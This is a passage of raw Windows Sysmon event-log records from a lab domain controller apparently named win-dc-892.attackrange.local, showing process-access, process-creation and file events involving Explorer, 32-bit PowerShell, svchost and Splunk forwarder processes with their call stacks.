ll.dll+51821 10341000x80000000000000009919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65AC-6064-5201-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.876{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AC-6064-5201-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.736{266CAFBE-65AC-6064-5201-00000000AE01}636C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.579{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+95cf|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64) 10341000x80000000000000009914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.579{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+95cf|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64) 10341000x80000000000000009913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.579{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8 10341000x80000000000000009912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.579{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5 10341000x80000000000000009911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.563{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3eaa(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+95cf|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64) 10341000x80000000000000009910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.563{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5 10341000x80000000000000009909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.563{266CAFBE-65AB-6064-5001-00000000AE01}24566752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92d97|C:\Windows\SYSTEM32\ntdll.dll+77f25|C:\Windows\SYSTEM32\ntdll.dll+77d8e|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+c5ddd(wow64)|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+c2f8|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+acc5|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe+95cf 23542300x80000000000000009908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.532{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D43FF3AF845F123DBF43C1FBD7993F5,SHA256=2BD15CBB8E518ACDE6796A8DBC500CFFB093F09EE80840167AE758CB4451E74C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.220{266CAFBE-65AB-6064-4F01-00000000AE01}67965080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.204{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.204{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.157{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35099BD333F38A080196D4EE68D33F4B,SHA256=32BD39095260FA371C380590DB6A617C01D656F4F2C9258163E52D2CA75F56BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 